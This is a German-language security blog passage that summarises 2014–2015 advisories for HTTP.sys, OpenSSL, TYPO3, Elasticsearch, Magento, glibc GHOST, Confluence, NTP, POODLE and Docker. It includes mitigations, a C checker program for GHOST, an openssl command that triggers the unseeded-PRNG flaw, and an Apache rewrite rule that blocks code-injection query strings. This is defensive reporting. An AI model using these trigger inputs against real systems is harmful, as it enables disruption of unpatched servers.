Ein kritischer Bug in Microsofts HTTP.sys - Library, die unter anderem von Webserver IIS und anderen Diensten genutzt wird, erlaubt Remote Code Execution; aus dem Security Bulletin:

The vulnerability could allow remote code execution if an attacker sends a specially crafted HTTP request to an affected Windows system. This security update is rated Critical for all supported editions of Windows 7, Windows Server 2008 R2, Windows 8, Windows Server 2012, Windows 8.1, and Windows Server 2012 R2.

Betroffen sind alle Server (Windows Server 2008 R2, Windows Server 2012) als auch Client-Version (Windows 7/8/8.1).

Es wird dringend angeraten, die zur Verfügung stehenden Updates einzuspielen, weitere Mitigations sind nicht benannt; ein Knowledgebase-Artikel stellt weitere Infos bereit.

An einem POC zum Exploit der Lücke wird bereits gearbeitet.

Mitigations

Nach Aussage eines Kommentars bei Reddit lässt sich das Problem umgehen, wenn man den Kernel-Cache für statische Dateien deaktiviert; der Vorteil der Lösung: sie ist instantan aktiv und benötigt keinen Restart des Servers; Nachteil: durch das Deaktivieren des Kernel-Caches kann die Performance beim Ausliefern statischer Dateien beeinträchtigt werden.

# web.config

<configuration>
  <system.webServer>
    <caching enableKernelCache="false"/>
  </system.webServer>
</configuration>

Referenzen

  1. Microsoft Security Bulletin MS15-034 - Critical: Vulnerability in HTTP.sys Could Allow Remote Code Execution (3042553)
  2. MS Knowledgebase
  3. POC
  4. The Delicate Art of Remote Checks – A Glance Into MS15-034
  5. HN
  6. reddit
  7. FAQ @ Sans.ISC: MS15-034: HTTP.sys (IIS) DoS And Possible Remote Code Execution



SB 15.07 :: OpenSSL-Update schließt DoS - und MitM - Lücken (CVE-2015-0291)

2015.03.19

Das OpenSSL-Team hat ein Security Advisory und Updates für OpenSSL veröffentlicht, in dem mehrere, als "High" eingestufte Sicherheitslücken geschlossen wurde.

Die erste Lücke (CVE-2015-0291) betrifft OpenSSL 1.0.2 und sorgt für einen DoS des entsprechenden Servers. Da OpenSSL 1.0.2 erst im Januar veröffentlicht wurde, ist der Impact eher gering. Nach Angabben von David Ramos ecistiert bereits ein PoC:

I have working exploit for upcoming CVE-2015-0291 1.0.2 server DoS. As far as I know not active in wild.

Die zweite Lücke (CVE-2015-0204) schließt die vor kurzem geschlossene Freakattack - Lücke, die über einen Cipher-Downgrade einen MitM-Angriff ermöglichte.


Nach Angaben der LibreSSL - Entwickler ist LibreSSL von den schweren Lücken nicht betroffen sondern nur insg 5 als moderat oder low eingestuften:

Official word outbound: Of the 13 CVE's only 5 affect #LibreSSL: CVE-2015-0207 CVE-2015-0286 CVE-2015-0287 CVE-2015-0289 CVE-2015-0209.

Weitere geschlossenen 13 Lücken haben die Einstufung "Moderate" oder "Low"; anbei der komplette Text des Advisories:

OpenSSL Security Advisory [19 Mar 2015]
=======================================

OpenSSL 1.0.2 ClientHello sigalgs DoS (CVE-2015-0291)
=====================================================

Severity: High

If a client connects to an OpenSSL 1.0.2 server and renegotiates with an
invalid signature algorithms extension a NULL pointer dereference will occur.
This can be exploited in a DoS attack against the server.

This issue affects OpenSSL version: 1.0.2

OpenSSL 1.0.2 users should upgrade to 1.0.2a.

This issue was was reported to OpenSSL on 26th February 2015 by David Ramos
of Stanford University. The fix was developed by Stephen Henson and Matt
Caswell of the OpenSSL development team.

Reclassified: RSA silently downgrades to EXPORT_RSA [Client] (CVE-2015-0204)
============================================================================

Severity: High

This security issue was previously announced by the OpenSSL project and
classified as "low" severity. This severity rating has now been changed to
"high".

This was classified low because it was originally thought that server RSA
export ciphersuite support was rare: a client was only vulnerable to a MITM
attack against a server which supports an RSA export ciphersuite. Recent
studies have shown that RSA export ciphersuites support is far more common.

This issue affects OpenSSL versions: 1.0.1, 1.0.0 and 0.9.8.

OpenSSL 1.0.1 users should upgrade to 1.0.1k.
OpenSSL 1.0.0 users should upgrade to 1.0.0p.
OpenSSL 0.9.8 users should upgrade to 0.9.8zd.

This issue was reported to OpenSSL on 22nd October 2014 by Karthikeyan
Bhargavan of the PROSECCO team at INRIA. The fix was developed by Stephen
Henson of the OpenSSL core team. It was previously announced in the OpenSSL
security advisory on 8th January 2015.

Multiblock corrupted pointer (CVE-2015-0290)
============================================

Severity: Moderate

OpenSSL 1.0.2 introduced the "multiblock" performance improvement. This feature
only applies on 64 bit x86 architecture platforms that support AES NI
instructions. A defect in the implementation of "multiblock" can cause OpenSSL's
internal write buffer to become incorrectly set to NULL when using non-blocking
IO. Typically, when the user application is using a socket BIO for writing, this
will only result in a failed connection. However if some other BIO is used then
it is likely that a segmentation fault will be triggered, thus enabling a
potential DoS attack.

This issue affects OpenSSL version: 1.0.2

OpenSSL 1.0.2 users should upgrade to 1.0.2a.

This issue was reported to OpenSSL on 13th February 2015 by Daniel Danner and
Rainer Mueller. The fix was developed by Matt Caswell of the OpenSSL development
team.

Segmentation fault in DTLSv1_listen (CVE-2015-0207)
===================================================

Severity: Moderate

The DTLSv1_listen function is intended to be stateless and processes the initial
ClientHello from many peers. It is common for user code to loop over the call to
DTLSv1_listen until a valid ClientHello is received with an associated cookie. A
defect in the implementation of DTLSv1_listen means that state is preserved in
the SSL object from one invocation to the next that can lead to a segmentation
fault. Errors processing the initial ClientHello can trigger this scenario. An
example of such an error could be that a DTLS1.0 only client is attempting to
connect to a DTLS1.2 only server.

This issue affects OpenSSL version: 1.0.2

OpenSSL 1.0.2 DTLS users should upgrade to 1.0.2a.

This issue was reported to OpenSSL on 27th January 2015 by Per Allansson. The
fix was developed by Matt Caswell of the OpenSSL development team.

Segmentation fault in ASN1_TYPE_cmp (CVE-2015-0286)
===================================================

Severity: Moderate

The function ASN1_TYPE_cmp will crash with an invalid read if an attempt is
made to compare ASN.1 boolean types. Since ASN1_TYPE_cmp is used to check
certificate signature algorithm consistency this can be used to crash any
certificate verification operation and exploited in a DoS attack. Any
application which performs certificate verification is vulnerable including
OpenSSL clients and servers which enable client authentication.

This issue affects all current OpenSSL versions: 1.0.2, 1.0.1, 1.0.0 and 0.9.8.

OpenSSL 1.0.2 users should upgrade to 1.0.2a
OpenSSL 1.0.1 users should upgrade to 1.0.1m.
OpenSSL 1.0.0 users should upgrade to 1.0.0r.
OpenSSL 0.9.8 users should upgrade to 0.9.8zf.

This issue was discovered and fixed by Stephen Henson of the OpenSSL
development team.

Segmentation fault for invalid PSS parameters (CVE-2015-0208)
=============================================================

Severity: Moderate

The signature verification routines will crash with a NULL pointer
dereference if presented with an ASN.1 signature using the RSA PSS
algorithm and invalid parameters. Since these routines are used to verify
certificate signature algorithms this can be used to crash any
certificate verification operation and exploited in a DoS attack. Any
application which performs certificate verification is vulnerable including
OpenSSL clients and servers which enable client authentication.

This issue affects OpenSSL version: 1.0.2

OpenSSL 1.0.2 users should upgrade to 1.0.2a

This issue was was reported to OpenSSL on 31st January 2015 by Brian Carpenter
and a fix developed by Stephen Henson of the OpenSSL development team.

ASN.1 structure reuse memory corruption (CVE-2015-0287)
=======================================================

Severity: Moderate

Reusing a structure in ASN.1 parsing may allow an attacker to cause
memory corruption via an invalid write. Such reuse is and has been
strongly discouraged and is believed to be rare.

Applications that parse structures containing CHOICE or ANY DEFINED BY
components may be affected. Certificate parsing (d2i_X509 and related
functions) are however not affected. OpenSSL clients and servers are
not affected.

This issue affects all current OpenSSL versions: 1.0.2, 1.0.1, 1.0.0
and 0.9.8.

OpenSSL 1.0.2 users should upgrade to 1.0.2a
OpenSSL 1.0.1 users should upgrade to 1.0.1m.
OpenSSL 1.0.0 users should upgrade to 1.0.0r.
OpenSSL 0.9.8 users should upgrade to 0.9.8zf.

This issue was discovered by Emilia Käsper and a fix developed by
Stephen Henson of the OpenSSL development team.

PKCS7 NULL pointer dereferences (CVE-2015-0289)
===============================================

Severity: Moderate

The PKCS#7 parsing code does not handle missing outer ContentInfo correctly.
An attacker can craft malformed ASN.1-encoded PKCS#7 blobs with
missing content and trigger a NULL pointer dereference on parsing.

Applications that verify PKCS#7 signatures, decrypt PKCS#7 data or
otherwise parse PKCS#7 structures from untrusted sources are
affected. OpenSSL clients and servers are not affected.

This issue affects all current OpenSSL versions: 1.0.2, 1.0.1, 1.0.0
and 0.9.8.

OpenSSL 1.0.2 users should upgrade to 1.0.2a
OpenSSL 1.0.1 users should upgrade to 1.0.1m.
OpenSSL 1.0.0 users should upgrade to 1.0.0r.
OpenSSL 0.9.8 users should upgrade to 0.9.8zf.

This issue was reported to OpenSSL on February 16th 2015 by Michal
Zalewski (Google) and a fix developed by Emilia Käsper of the OpenSSL
development team.

Base64 decode (CVE-2015-0292)
=============================

Severity: Moderate

A vulnerability existed in previous versions of OpenSSL related to the
processing of base64 encoded data. Any code path that reads base64 data from an
untrusted source could be affected (such as the PEM processing routines).
Maliciously crafted base 64 data could trigger a segmenation fault or memory
corruption. This was addressed in previous versions of OpenSSL but has not been
included in any security advisory until now.

This issue affects OpenSSL versions: 1.0.1, 1.0.0 and 0.9.8.

OpenSSL 1.0.1 users should upgrade to 1.0.1h.
OpenSSL 1.0.0 users should upgrade to 1.0.0m.
OpenSSL 0.9.8 users should upgrade to 0.9.8za.

The fix for this issue can be identified by commits d0666f289a (1.0.1),
84fe686173 (1.0.0) and 9febee0272 (0.9.8). This issue was originally reported by
Robert Dugal and subsequently by David Ramos.

DoS via reachable assert in SSLv2 servers (CVE-2015-0293)
=========================================================

Severity: Moderate

A malicious client can trigger an OPENSSL_assert (i.e., an abort) in
servers that both support SSLv2 and enable export cipher suites by sending
a specially crafted SSLv2 CLIENT-MASTER-KEY message.

This issue affects all current OpenSSL versions: 1.0.2, 1.0.1, 1.0.0
and 0.9.8.

OpenSSL 1.0.2 users should upgrade to 1.0.2a
OpenSSL 1.0.1 users should upgrade to 1.0.1m.
OpenSSL 1.0.0 users should upgrade to 1.0.0r.
OpenSSL 0.9.8 users should upgrade to 0.9.8zf.

This issue was discovered by Sean Burford (Google) and Emilia Käsper
(OpenSSL development team) in March 2015 and the fix was developed by
Emilia Käsper.

Empty CKE with client auth and DHE (CVE-2015-1787)
==================================================

Severity: Moderate

If client auth is used then a server can seg fault in the event of a DHE
ciphersuite being selected and a zero length ClientKeyExchange message being
sent by the client. This could be exploited in a DoS attack.

This issue affects OpenSSL version: 1.0.2

OpenSSL 1.0.2 users should upgrade to 1.0.2a.

This issue was discovered and the fix was developed by Matt Caswell of the
OpenSSL development team.

Handshake with unseeded PRNG (CVE-2015-0285)
============================================

Severity: Low

Under certain conditions an OpenSSL 1.0.2 client can complete a handshake with
an unseeded PRNG. The conditions are:
- The client is on a platform where the PRNG has not been seeded automatically,
and the user has not seeded manually
- A protocol specific client method version has been used (i.e. not
SSL_client_methodv23)
- A ciphersuite is used that does not require additional random data from the
PRNG beyond the initial ClientHello client random (e.g. PSK-RC4-SHA).

If the handshake succeeds then the client random that has been used will have
been generated from a PRNG with insufficient entropy and therefore the output
may be predictable.

For example using the following command with an unseeded openssl will succeed on
an unpatched platform:

openssl s_client -psk 1a2b3c4d -tls1_2 -cipher PSK-RC4-SHA

This issue affects OpenSSL version: 1.0.2

OpenSSL 1.0.2 users should upgrade to 1.0.2a.

This issue was discovered and the fix was developed by Matt Caswell of the
OpenSSL development team.

Use After Free following d2i_ECPrivatekey error (CVE-2015-0209)
===============================================================

Severity: Low

A malformed EC private key file consumed via the d2i_ECPrivateKey function could
cause a use after free condition. This, in turn, could cause a double
free in several private key parsing functions (such as d2i_PrivateKey
or EVP_PKCS82PKEY) and could lead to a DoS attack or memory corruption
for applications that receive EC private keys from untrusted
sources. This scenario is considered rare.

This issue affects all current OpenSSL versions: 1.0.2, 1.0.1, 1.0.0 and 0.9.8.

OpenSSL 1.0.2 users should upgrade to 1.0.2a
OpenSSL 1.0.1 users should upgrade to 1.0.1m.
OpenSSL 1.0.0 users should upgrade to 1.0.0r.
OpenSSL 0.9.8 users should upgrade to 0.9.8zf.

This issue was discovered by the BoringSSL project and fixed in their commit
517073cd4b. The OpenSSL fix was developed by Matt Caswell of the OpenSSL
development team.

X509_to_X509_REQ NULL pointer deref (CVE-2015-0288)
===================================================

Severity: Low

The function X509_to_X509_REQ will crash with a NULL pointer dereference if
the certificate key is invalid. This function is rarely used in practice.

This issue affects all current OpenSSL versions: 1.0.2, 1.0.1, 1.0.0
and 0.9.8.

OpenSSL 1.0.2 users should upgrade to 1.0.2a
OpenSSL 1.0.1 users should upgrade to 1.0.1m.
OpenSSL 1.0.0 users should upgrade to 1.0.0r.
OpenSSL 0.9.8 users should upgrade to 0.9.8zf.

This issue was discovered by Brian Carpenter and a fix developed by Stephen
Henson of the OpenSSL development team.

Note
====

As per our previous announcements and our Release Strategy
(https://www.openssl.org/about/releasestrat.html), support for OpenSSL versions
1.0.0 and 0.9.8 will cease on 31st December 2015. No security updates for these
releases will be provided after that date. Users of these releases are advised
to upgrade.

References
==========

URL for this Security Advisory:
https://www.openssl.org/news/secadv_20150319.txt

Note: the online version of the advisory may be updated with additional
details over time.

For details of OpenSSL severity classifications please see:
https://www.openssl.org/about/secpolicy.html

Referenzen




SB 15.06 :: OpenSSL kündigt High-Security - Release an (Update 2)

2015.03.17

Das OpenSSL - Team hat eine Release angekündigt, in dem mind eine schwere Lücke geschlossen wird; das Release wird am 19.03. verfügbar sein.

Nach Aussage von Mark Cox betrifft die schere Lücke vornehmlich OpenSSL 1.0.2, dass erst im Januar released wurde und noch keine weite Verbreitung gefunden hat. Für andere OpenSSL-Versione wurde die Lücke mit "Moderate" und "Low" klassifiziert.

Das Releas ist zwischen 11 und 15Uhr UTC angekündigt

Forthcoming OpenSSL releases 
============================ 

The OpenSSL project team would like to announce the forthcoming release 
of OpenSSL versions 1.0.2a, 1.0.1m, 1.0.0r and 0.9.8zf. 

These releases will be made available on 19th March. They will fix a 
number of security defects. The highest severity defect fixed by these 
releases is classified as "high" severity. 

Yours 

The OpenSSL Project Team 



SB 15.05 :: [TYPO3-announce] Important Security-Bulletin Pre-Announcement

2015.02.17

The TYPO3 security team has identified a critical security issue in the TYPO3 v4 Core.

The following branches are affected by the vulnerability:
* TYPO3 4.3
* TYPO3 4.4
* TYPO3 4.5
* TYPO3 4.6

Only TYPO3 installations which use the frontend login functionality are affected by this vulnerability.
Newer TYPO3 versions (4.7.0 or higher) are *NOT* affected!

A TYPO3 4.5.40 release containing a security fix will be published the day after tomorrow, 
Thursday 19th of February at about 10:00 am CET.

If possible, we will provide patches for not supported releases.

Since this is a very important security fix, please be prepared to update your
TYPO3 installations on Thursday.

Until the advisory is out, please understand that we cannot provide 
any further information.


CVSS v2.0 data on the to be released bulletin:
Base AV:N/AC:L/Au:N/C:P/I:P/A:N | Temporal E:F/RL:O/RC:C


TYPO3 Security Team homepage: http://typo3.org/teams/security/

Referenzen




SB 15.04 :: Lücke in ElasticSearch erlaubt Remote Code Execution (CVE-2015-1427)

2015.02.16

Das ElasticSearch - Team stellt mit den Versionen 1.4.3 und 1.3.8 Updates bereit, die eine Lücke in der Scripting-Engine schließen, durch die ein Angreifer aus der Sandbox ausbrechen und Kommandos mit den Rechten des ElasticSearch - Users ausführen konnten. Aus den ReleaseNotes

groovy scripting vulnerability found

Elasticsearch versions 1.3.0-1.3.7 and 1.4.0-1.4.2 have a vulnerability in the Groovy scripting engine. The vulnerability allows an attacker to construct Groovy scripts that escape the sandbox and execute shell commands as the user running the Elasticsearch Java VM.

Workarounds

Nutzern wird dringend empfohlen, die Versionen upzudaten; falls dies nicht möglich sein sollte kann man dynamische Groovy-Scripts mit folgender Option in elasticsearch.yml deaktivieren:

script.groovy.sandbox.enabled: false

Weitere Infos, wie man Groovy-Scripts weiterhin nutzen kann und einen Ausblick auf die Zukunft von Groovy in ElasticSearch geben die Releasenotes.

Referenzen




SB 15.03 :: Kritische Lücke in Magento erlaubt Remote Code Execution (Update)

2015.02.13

Das Magento-Team hat eine Lücke geschlossen (SUPEE-5344) hinter der sich nach eigenen Angaben eine Remote Code Execution verbergen kann: "SUPEE-5344 - Addresses a potential remote code execution exploit. - Added Feb 9, 2015"

Patches für die Versionen 1.4.x-1.9.x stehen über das Download-Portal zur Verfügung, weitere offizielle Informationen hat das Magento-team leider zum jetzigen Zeitpunkt nicht bereitgestellt; lediglich via Twitter gab es folgende Meldung

New CE/EE patch to address a potential remote code execution issue. Download from Support Portal or CE download page http://bit.ly/PNgTJI

Nach Analyse des Patches für den 1.8er-Branch haben die Magento-Entwickler die RCe-Lücke selber noch nicht gefixt, sondern nur einen Weg, diese aus der Ferne auszuführen.

Credits: @Naxsi_WAF

Update

  • 2015-04-17 - byte.nl stellt einen Online-Test für Shopbetreiber bereit

Referenzen




SB 15.02 :: GHOST in the Host: Kritische Lücke in glibc ermöglicht Remote Code Execution ( CVE-2015-0235)

2015.01.27

Qualys hat ein Advisory veröffentlicht, in dem vor einer kritischen Lücke in der glibc 2.x gewarnt wird; der Bug befindet sich in den Funktionen gethostbyname() und ermöglicht einem entferntem Angreifer, Code mit Rechten des Prozesses auszuführen:

- Via gethostbyname() or gethostbyname2(), the overflowed buffer is
  located in the heap. Via gethostbyname_r() or gethostbyname2_r(), the
  overflowed buffer is caller-supplied (and may therefore be located in
  the heap, stack, .data, .bss, etc; however, we have seen no such call
  in practice).

- At most sizeof(char *) bytes can be overwritten (ie, 4 bytes on 32-bit
  machines, and 8 bytes on 64-bit machines). Bytes can be overwritten
  only with digits ('0'...'9'), dots ('.'), and a terminating null
  character ('\0').

- Despite these limitations, arbitrary code execution can be achieved.
  As a proof of concept, we developed a full-fledged remote exploit
  against the Exim mail server, bypassing all existing protections
  (ASLR, PIE, and NX) on both 32-bit and 64-bit machines. We will
  publish our exploit as a Metasploit module in the near future.

- The first vulnerable version of the GNU C Library is glibc-2.2,
  released on November 10, 2000.

Der Bug hat den Namen "GHOST" erhalten.

Eine ausführliche Beschreibung liefert der Blogpost The GHOST Vulnerability im Qualys-Blog

Mitigations

Alle betroffenen Linux-Distributionen stellen Updates bereit, diese sollten unverzüglich eingespielt werden. Ein POC ist verfügbar, wurde aber bisher noch nicht veröffentlicht.

Betroffene Distributionen & Services

  • Debian 7 (wheezy)
  • Debian 6 (squeeze)
  • Red Hat Enterprise Linux 6 & 7
  • CentOS 6 & 7,
  • Ubuntu 12.04
  • SLES 11

In einer Mail werden potentiell angreifbare Dienste aufgelistet:

  • apache
  • cups
  • dovecot
  • gnupg
  • isc-dhcp
  • lighttpd
  • mariadb/mysql
  • nfs-utils
  • nginx nein
  • nodejs
  • openldap
  • openssh
  • postfix
  • proftpd
  • pure-ftpd
  • rsyslog
  • samba
  • sendmail
  • sysklogd
  • syslog-ng
  • tcp_wrappers
  • vsftpd
  • xinetd

Tests

Qualys stellt im Advisory ein C-Programm zur Verfügung, mitdem betroffene System lokal getestet werdne können:

#include <netdb.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <errno.h>

#define CANARY "in_the_coal_mine"

struct {
  char buffer[1024];
  char canary[sizeof(CANARY)];
} temp = { "buffer", CANARY };

int main(void) {
  struct hostent resbuf;
  struct hostent *result;
  int herrno;
  int retval;

  /*** strlen (name) = size_needed - sizeof (*host_addr) - sizeof (*h_addr_ptrs) - 1; ***/
  size_t len = sizeof(temp.buffer) - 16*sizeof(unsigned char) - 2*sizeof(char *) - 1;
  char name[sizeof(temp.buffer)];
  memset(name, '0', len);
  name[len] = '\0';

  retval = gethostbyname_r(name, &resbuf, temp.buffer, sizeof(temp.buffer), &result, &herrno);

  if (strcmp(temp.canary, CANARY) != 0) {
    puts("vulnerable");
    exit(EXIT_SUCCESS);
  }
  if (retval == ERANGE) {
    puts("not vulnerable");
    exit(EXIT_SUCCESS);
  }
  puts("should not happen");
  exit(EXIT_FAILURE);
}

Ein Testergebnis eines angreifbaren Systems sieht folgendermassen aus

[dorvakt@debian7 ]$ ./GHOST
vulnerable

Nach den Updates:

[dorvakt@debian7 ]$ ./GHOST
not vulnerable

Nach einspielen der Updates kann man mit folgendem Kommando überprüfen, ob laufende Dienste und Prohgramme ggfs noch die alte Version der libc benutzen; diese solten neu gestartet werden im Zweifel kann man den kompletten Server neu booten, um das Laden der neuen Version der libc zu erzwingen:

# lsof | grep libc- | grep DEL

udevd       306           root  DEL       REG              254,1             3146246 /lib/x86_64-linux-gnu/libc-2.13.so
vnstatd    1820           root  DEL       REG              254,1             3146246 /lib/x86_64-linux-gnu/libc-2.13.so
cron       1998           root  DEL       REG              254,1             3146246 /lib/x86_64-linux-gnu/libc-2.13.so
sshd       2005           root  DEL       REG              254,1             3146246 /lib/x86_64-linux-gnu/libc-2.13.so
memcached  2044         nobody  DEL       REG              254,1             3146246 /lib/x86_64-linux-gnu/libc-2.13.so
memcached  2044  2059   nobody  DEL       REG              254,1             3146246 /lib/x86_64-linux-gnu/libc-2.13.so
memcached  2044  2060   nobody  DEL       REG              254,1             3146246 /lib/x86_64-linux-gnu/libc-2.13.so
memcached  2044  2061   nobody  DEL       REG              254,1             3146246 /lib/x86_64-linux-gnu/libc-2.13.so
memcached  2044  2062   nobody  DEL       REG              254,1             3146246 /lib/x86_64-linux-gnu/libc-2.13.so
memcached  2044  2065   nobody  DEL       REG              254,1             3146246 /lib/x86_64-linux-gnu/libc-2.13.so
master     2230           root  DEL       REG              254,1             3146246 /lib/x86_64-linux-gnu/libc-2.13.so
qmgr       2242        postfix  DEL       REG              254,1             3146246 /lib/x86_64-linux-gnu/libc-2.13.so
getty      2265           root  DEL       REG              254,1             3146246 /lib/x86_64-linux-gnu/libc-2.13.so
getty      2266           root  DEL       REG              254,1             3146246 /lib/x86_64-linux-gnu/libc-2.13.so
getty      2267           root  DEL       REG              254,1             3146246 /lib/x86_64-linux-gnu/libc-2.13.so
getty      2268           root  DEL       REG              254,1             3146246 /lib/x86_64-linux-gnu/libc-2.13.so
getty      2269           root  DEL       REG              254,1             3146246 /lib/x86_64-linux-gnu/libc-2.13.so
getty      2270           root  DEL       REG              254,1             3146246 /lib/x86_64-linux-gnu/libc-2.13.so
pickup     4977        postfix  DEL       REG              254,1             3146295 /lib/x86_64-linux-gnu/libc-2.13.so
sshd       4981           root  DEL       REG              254,1             3146295 /lib/x86_64-linux-gnu/libc-2.13.so
sshd       4983         usrsu   DEL       REG              254,1             3146295 /lib/x86_64-linux-gnu/libc-2.13.so
bash       4984         usrsu   DEL       REG              254,1             3146295 /lib/x86_64-linux-gnu/libc-2.13.so
log-couri  5287           root  DEL       REG              254,1             3146295 /lib/x86_64-linux-gnu/libc-2.13.so
log-couri  5287  5288     root  DEL       REG              254,1             3146295 /lib/x86_64-linux-gnu/libc-2.13.so
log-couri  5287  5290     root  DEL       REG              254,1             3146295 /lib/x86_64-linux-gnu/libc-2.13.so
log-couri  5287  5301     root  DEL       REG              254,1             3146295 /lib/x86_64-linux-gnu/libc-2.13.so
log-couri  5287  5302     root  DEL       REG              254,1             3146295 /lib/x86_64-linux-gnu/libc-2.13.so
log-couri  5287  5303     root  DEL       REG              254,1             3146295 /lib/x86_64-linux-gnu/libc-2.13.so
xinetd     5377           root  DEL       REG              254,1             3146295 /lib/x86_64-linux-gnu/libc-2.13.so
nginx      7365           root  DEL       REG              254,1             3146295 /lib/x86_64-linux-gnu/libc-2.13.so
bash      13895         usrsu   DEL       REG              254,1             3146295 /lib/x86_64-linux-gnu/libc-2.13.so
go.sh     13896         usrsu   DEL       REG              254,1             3146295 /lib/x86_64-linux-gnu/libc-2.13.so
gunicorn  14179         usrsu   DEL       REG              254,1             3146295 /lib/x86_64-linux-gnu/libc-2.13.so
tail      14180         usrsu   DEL       REG              254,1             3146295 /lib/x86_64-linux-gnu/libc-2.13.so
gunicorn  14185         usrsu   DEL       REG              254,1             3146295 /lib/x86_64-linux-gnu/libc-2.13.so
gunicorn  14186         usrsu   DEL       REG              254,1             3146295 /lib/x86_64-linux-gnu/libc-2.13.so
gunicorn  14187         usrsu   DEL       REG              254,1             3146295 /lib/x86_64-linux-gnu/libc-2.13.so
gunicorn  14188         usrsu   DEL       REG              254,1             3146295 /lib/x86_64-linux-gnu/libc-2.13.so
nginx     15727         usrsu   DEL       REG              254,1             3146295 /lib/x86_64-linux-gnu/libc-2.13.so
nginx     15728         usrsu   DEL       REG              254,1             3146295 /lib/x86_64-linux-gnu/libc-2.13.so
nginx     15729         usrsu   DEL       REG              254,1             3146295 /lib/x86_64-linux-gnu/libc-2.13.so
nginx     15730         usrsu   DEL       REG              254,1             3146295 /lib/x86_64-linux-gnu/libc-2.13.so
nginx     15731         usrsu   DEL       REG              254,1             3146295 /lib/x86_64-linux-gnu/libc-2.13.so
nginx     15732         usrsu   DEL       REG              254,1             3146295 /lib/x86_64-linux-gnu/libc-2.13.so
nginx     15733         usrsu   DEL       REG              254,1             3146295 /lib/x86_64-linux-gnu/libc-2.13.so
nginx     15734         usrsu   DEL       REG              254,1             3146295 /lib/x86_64-linux-gnu/libc-2.13.so
nginx     15735         usrsu   DEL       REG              254,1             3146295 /lib/x86_64-linux-gnu/libc-2.13.so
udevd     19184           root  DEL       REG              254,1             3146246 /lib/x86_64-linux-gnu/libc-2.13.so
udevd     19185           root  DEL       REG              254,1             3146246 /lib/x86_64-linux-gnu/libc-2.13.so
rsyslogd  20184           root  DEL       REG              254,1             3146295 /lib/x86_64-linux-gnu/libc-2.13.so
rs:main   20184 20185     root  DEL       REG              254,1             3146295 /lib/x86_64-linux-gnu/libc-2.13.so
rsyslogd  20184 20186     root  DEL       REG              254,1             3146295 /lib/x86_64-linux-gnu/libc-2.13.so
rsyslogd  20184 20187     root  DEL       REG              254,1             3146295 /lib/x86_64-linux-gnu/libc-2.13.so
acpid     20758           root  DEL       REG              254,1             3146295 /lib/x86_64-linux-gnu/libc-2.13.so

Referenzen




SB 15.01 :: Kritische Lücke in Confluence et al

2015.01.22

In einem Advisory weist Atlassian auf eine Lücke in Confluence hin, die u.U. zu Remote Code Execution führen kann; Voraussetzung ist, dass der Angreifer Zugriff auf einen Account hat:

"We have discovered and fixed a vulnerability in our fork of WebWork. Attackers can use this vulnerability to execute Java code of their choice on systems that use this framework. The attacker needs to have an account and be able to access the Confluence web interface."

Betroffen sind alle Versionen bis und einschließlich 5.6., aber auch die Produkte Bamboo, FishEye und Crucible

Mitigations

Anwender der Naxsi-WAF sind bereits vor den Lücken geschützt, für Apache-User stellt das untenstehende Snippet bereit; User von Atlassian-Produkten werden dringend angehalten, ihre Installationen abzudaten:

RewriteCond %{QUERY_STRING} (?:[{(]|%7[bB]|%28).*(?:[})]|%7[dD]|%29)
RewriteRule ^               -  [F,L]

Referenzen




SB 14.26 :: Kritische Lücke in NTPD erlaubt Remote Code Execution (CVE-2014-9295) (Update 2)

2014.12.19

Am 19.12. hat das NTP-Team ein Advisory veröffentlicht, in dem vor mehreren kritischen Lücken im NTP-Server gewarnt wird, die u.U. zu Remote Code Execution führen.

Das NTP-Team hat die Lücken in der Version 4.2.8 gefixt, momentan (19.12. 18.30 CET) stehen aber für die Linux-Distributionen noch keine Updates bereit.

Betreibern von öffentlich erreichbaren NTP-Servern wird geraten, die NTP-Dienste vorsorglich herunterzufahren oder per Firewall zu schützen, bis Updates bereit stehen; selbst IP ACLs könnten teilweise nicht ausreichend sein

Mitigations

  • Updates stehen bereit

  • das NTP-Team listet folgende Möglichkeit, um das Ausnutzen der Bugs zu beschränken:

The vulnerabilities listed below can be significantly mitigated by following the BCP of putting

 restrict default ... noquery

in the ntp.conf file. With the exception of: receive() missing return on error - 
References: Sec 2670 / CVE-2014-9296 / VU#852879 below (which is a
limited-risk vulnerability), none of the recent vulnerabilities listed below 
can be exploited if the source IP is restricted from sending a 
'query'-class packet by your ntp.conf file.

Infos zu den Lücken:

  • Buffer overflow in crypto_recv()

    • Summary: When Autokey Authentication is enabled (i.e. the ntp.conf file contains a crypto pw ... directive) a remote attacker can send a carefully crafted packet that can overflow a stack buffer and potentially allow malicious code to be executed with the privilege level of the ntpd process
  • Buffer overflow in ctl_putdata()

    • Summary: A remote attacker can send a carefully crafted packet that can overflow a stack buffer and potentially allow malicious code to be executed with the privilege level of the ntpd process.
  • Buffer overflow in configure()

    • Summary: A remote attacker can send a carefully crafted packet that can overflow a stack buffer and potentially allow malicious code to be executed with the privilege level of the ntpd process.

Update 2

  • 2014-12-22 - weitere Mitigations durch das NTP-Team
  • 2014-12-22 - Updates für Debian, RedHat und SLES stehen bereit

Update 1

  • 2014-12-19 - RedHat arbeitet an Updates

Referenzen




SB 14.25 :: The POODLE bites again

2014.12.08

Adam Langley vom Google Security Team berichtet über eine Schwachstelle in der TLS-Implementierung namhafter Appliances (z.B. Loadbalancer der Firme F5 oder A10), die, trotz Abstellen von SSLv3, Poodle-Angriffe auf diese Applicances ermöglicht.

Nach Angaben von Ivan Ristic sind ca. 10% der Alexa Top 1 Mio -. Webseiten betroffen:

"There’s a new SSL/TLS problem being announced today and it’s likely to affect some of the most popular web sites in the world, owing largely to the popularity of F5 load balancers and the fact that these devices are impacted. There are other devices known to be affected, and it’s possible that the same flaw is present in some SSL/TLS stacks.

According to our most recent SSL Pulse scan (which hasn’t been published yet), about 10% of the servers are vulnerable to the POODLE attack against TLS.

SSLLabs - Servertest stellt in der neuen Version einen Test für die neue Lücke bereit.

Nach ersten Tests sind die Implementierungen von OpenSSL/LibreSSL nicht von den Problemen betroffen.

Referenzen




SB 14.24 :: Kritische Lücke in Docker erlaubt Remote Code Execution

2014.11.25

Das Docker-Team hat ein Advisory veröffentlicht, indem auf eine schwerwiegende Lücke in allen Docker-Versionen hingeweisen wird, die eine Privilege Excalation und Remote Code Execution ermöglicht.

Benutzern der Docker-Technologie wird dringend empfohlen, die Updates einzuspielen, da ein Workaround in den Versionen bis einschließlich 1.3.1 nicht möglich ist:

